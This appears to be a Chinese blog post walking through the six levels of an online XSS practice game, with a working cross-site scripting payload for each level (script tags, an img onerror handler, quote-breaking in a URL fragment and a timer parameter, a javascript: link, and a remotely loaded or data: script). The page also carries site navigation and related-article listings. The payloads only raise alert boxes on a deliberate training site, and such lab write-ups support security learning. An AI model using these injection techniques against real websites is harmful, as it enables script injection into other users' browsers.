2022-渗透测试-xss小游戏通关

已于 2022-02-04 23:22:35 修改
阅读量4.7k 收藏 5
点赞数 5
文章标签: xss web安全 运维 php 渗透测试
于 2022-01-25 13:51:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38612882/article/details/122682388
版权

这是一个在线靶场-xss小游戏通关,一共6关。链接地址:

XSS game (xss-game.appspot.com)https://xss-game.appspot.com/登陆成功后,页面如下。

第一关:Hello, world of XSS

第一关没有对输入的字符串进行任何的过滤,我们可以在漏洞的窗体或直接在输入栏输入特定的恶意url以之行你想要的JavaScript脚本。

<script>alert('123');</script>

 第二关:Persistence is key

如果还是输入<script>alert()</script>代码,发现并没有弹窗,预定义的字符代码已经被转译成了HTML实体了 。直接闭合前后标签,构造新的标签即可。

<img src="1.jpg" onerror="javascript:alert(1);"/>

 第三关:That sinking feeling...

这一关的输出是在img src里面,可以说是考js闭合问题,直接闭合前面的src,造成无法加载成功弹框。 

观察网页,是三张图片,分别代表三个不同的url链接。实际上就是用#后面跟的数字用来区分不同的图片。 

https://xss-game.appspot.com/level3/frame#'><script>alert(123);</script>

 

 第四关:Context matters

 我们将3改成<script>alert(123);</script>。

 地址栏直接输出了,但是奇怪的是下面的计时器脚本仍然被执行了,想到应该是设置了默认值。

查看网页源代码

    <script>
      function startTimer(seconds) {
        seconds = parseInt(seconds) || 3;
        setTimeout(function() { 
          window.confirm("Time is up!");
          window.history.back();
        }, seconds * 1000);
      }
    </script>

看到了确实有个默认值等于3秒,这就是之前直接alert弹窗失败的原因。

在地址栏加上引号,如图,此时进入了一个无线循环中。 

 闭合图中的startTimer()函数,然后弹框即可。

https://xss-game.appspot.com/level4/frame?timer=100'),alert('Borber

 第五关:Breaking protocol

 我们尝试输入<script>alert(123);</script>

 查看网页源代码

<!doctype html>
<html>
  <head>
    <!-- Internal game scripts/styles, mostly boring stuff -->
    <script src="/static/game-frame.js"></script>
    <link rel="stylesheet" href="/static/game-frame-styles.css" />
  </head>
 
  <body id="level5">
    <img src="/static/logos/level5.png" /><br><br>
    <!-- We're ignoring the email, but the poor user will never know! -->
    Enter email: <input id="reader-email" name="email" value="">
 
    <br><br>
    <a href="{{ next }}">Next >></a>
  </body>
</html>

可以看到一个超链接标签,这个是用来跳转到新页面的按钮,用到的代码结构如下。

<a href='javascript:doSomething()'>...</a>

执行权首先落在都Something()函数,若存在返回值则将返回值返给超链接进行合成。这样的便利催生了下面的注入代码:首先在地址栏输入注入代码接着敲回车键,这会更改其默认url地址,然后在输入栏再写一遍注入代码并回车即可。

https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert("Borber")

 第六关:Follow the 🐇

 尝试着输入

首先写一个最简单的一句话JavaScript脚本aa.js

alert(1);

放到/var/www/html/目录下面,接着开启Kali自带的apache2服务器。现在你的文件对目标网站是可见的了,至少说是可被加载的了。把下面的注入字符串写到#号后面实现代码注入。

HTTP:127.0.0.1/aa.js

注入成功。这里注意的是,跟在#后面的HTTP必须大写,否则在#后面要先写一个空格。

最简单的方法是这样写:

data:text/javascript,alert(1);

保持微笑-泽
关注
  • 5
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通关游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
Firefox-46.0-渗透测试
08-12
一款好的渗透测试浏览器插件可以大大提高我们渗透测试的效率,那么作为渗透测试人员,我们是否有一些不可或缺的浏览器插件呢 Cookie Manager+ Disable WebRTC Firebug Flagfox FoxyProxy Standard Groundspeed ...
050 XSS通关游戏——xss challenge
鸡蛋炒鸡蛋
03-05 5666
文章目录一:下载与部署二:通关过程首页level-01level-02level-03level-04level-05level-06level-07level-08level-09 一:下载与部署 xss challenge是个有关反射型xss的测试通关挑战,一共有20关。 下载地址:xss challenge (访问密码:donMkh) 下载之后解压,把得到的文件夹放在phpstudy的www文件夹下即可   二:通关过程 这个是我自己的通关方法,不一定很准确 首页 level-01 点击
Android&Html5混合开发WebView调试必备神器DevTools
热门推荐
qq_26585943的博客
04-09 2万+
Android开发和Html5开发,对于其对应的专业程序开发人员来说都不是太难.但是对于两者结合的混合开发来说,很多人都望而却步.混合开发其本身并不难,真正让大家不安的是WebView加载H5的异常定位.调试困难症在我们团队出现过,我在面试的过程中也刻意去了解大家对Android中js调试的掌握程度,但现实是:大家都是浅尝辄止,使用最原生的js调用Android方法打印调试信息.这样的调试,...
XSS-Game 通关教程,XSS-Game level1-18,XSS靶场通关教程_xss靶场level(1)
最新发布
2401_84254418的博客
05-08 662
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
小话游戏脚本(二)
tkokof1的专栏
10-09 904
  小话游戏脚本(二)二.一种基于命令的脚本语言   通过上面的讲述,我们对于基于命令的脚本也算有了一些感性的认识,之后么就是这次我认为比较关键的部分:设计一个基于命令的脚本语言。  由于本人写作此文的目的也是为了学习,所以暂时仅仅试探性的给出一些想法,至于正不正确、可不可行着实不能回答,而且,世上也不存在一蹴而就的完美设计,我们能做的也仅仅是一步步的完善罢了,所以本着迭代改进
XSS-通关游戏(1-20)
→_→
05-28 1万+
在玩游戏之前先简单的了解下,什么是XSS? 1.什么是xss XSS攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS,XSS是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。 2.xss原理 (1).攻击者对某含有漏洞的服务器发起XSS攻击(注入JS代码) (2)诱使受害者打开受到攻击的服务器URL(邮件、留言等,此步骤可选项) (3)受害者在Web浏览
Xss小游戏通关攻略带解释
sirius的博客
08-28 5446
Xss小游戏通关攻略 实验环境:xss小游戏源码+phpstudy 源码地址:https://files.cnblogs.com/files/Eleven-Liu/xss%E7%BB%83%E4%B9%A0%E5%B0%8F%E6%B8%B8%E6%88%8F.zip 实验步骤:启动phpstudy,浏览器访问127.0.0.1/xss/后提示点击图片进入第一关。 第一关:输入的变量直接被输出,直接构造payload即可。 http://127.0.0.1/xss/level1.php?.
xss-labs小游戏
01-25
20关的xss游戏题,每一位xss大佬都做过哟,放在网站根目录即可纵享丝滑,快来尝试吧!
Web-安全渗透全套教程XSS跨.zip
05-22
Web安全渗透是网络安全领域的重要部分,特别是针对Web应用程序的安全测试和防护。XSS(Cross-Site Scripting,跨站脚本攻击)是其中一种常见的安全漏洞,它允许攻击者通过在网页上注入恶意脚本,进而对用户浏览器...
xss-filter-spring-boot-starter:springboot自动xss
05-17
xss-filter-spring-boot-starter springboot自动xss 使用方法在项目的pom.xml中加入依赖即口 <groupId>com.djk</groupId> <artifactId>xss-filter-spring-boot-starter <version>0.0.1 目前支持3种入参数xss...
XSS20关练习源码
09-04
包含20关XSS练习的源码。文件都为PHP类型,下载个phpstudy就可以搭建起来了。我已经通过了,所以共享出来给大家练习。
XSS-14、15注入靶场闯关(小游戏)——第十四、五关
qq_39330735的博客
02-04 968
XSS-15注入靶场闯关(小游戏)——第十五关,文件链接注入通关详解
XSS-labs靶场1-13关解法答案
紫洋的博客
03-05 671
script>和数据只能有文本,不会有HTML解码和URL解码操作和里会有HTML解码操作,但不会有子元素其他元素数据(如div)和元素属性数据(如href)中会有HTML解码操作部分属性(如href)会有URL解码操作,但URL中的协议需为ASCIIJavaScript会对字符串和标识符Unicode解码根据浏览器的自动解码,反向构造 XSS Payload 即可。
XSS-GAME小游戏
weixin_43296565的博客
09-14 140
查看源代码,没有任何过滤,直接输入,弹框进入下一关。
XSS-Game 通关教程,XSS-Game level1-18,XSS靶场通关教程
wangyuxiang946的博客
01-07 1万+
XSS-Game level1 XSS-Game level2 XSS-Game level3 XSS-Game level4 XSS-Game level5 XSS-Game level6 XSS-Game level7 XSS-Game level8 XSS-Game level9 XSS-Game level10 XSS-Game level11 XSS-Game level12 XSS-Game level13 XSS-Game level16 XSS-Game level17
XSS漏洞:xss-labs靶场通关
qq_68163788的博客
01-16 2252
xss-lab是一个旨在帮助安全研究人员、开发人员和安全爱好者学习和理解跨站脚本攻击(XSS)的项目。它通常包括一系列设计精良的实验室环境,用于模拟真实世界中可能遇到的XSS漏洞场景。这些实验室环境通常包括各种不同类型和难度级别的XSS漏洞,以帮助学习者逐步提高他们的技能。 通过xss-lab项目,用户可以学习如何利用XSS漏洞来攻击网站、窃取用户信息、执行恶意代码等。同时,用户也可以学习如何防御和修复这些漏洞,从而提高网站的安全性。 xss-lab项目的目的是通过实践操作的方式来加深对XSS攻击的理解
xsschallenge通关攻略详解
一个努力学习网安的小牛马
11-12 542
简述xsschallenge挑战攻略ps:终极测试代码IPT</查看源代码CTRL+U。
XSS闯关小游戏(level1~13)
qq_43381463的博客
02-04 433
XSS闯关小游戏(level1~13)
-xmx -xms -xmn -xss
07-08
您的第一个问题是关于 JVM 的参数,分别是 -Xmx、-Xms、-Xmn 和 -Xss- -Xmx:指定 JVM 的最大堆内存大小,用于存放对象实例和数组。例如,-Xmx2g 将最大堆内存设置为 2GB。 - -Xms:指定 JVM 的初始堆内存大小,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

保持微笑-泽

谢谢鼓励

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值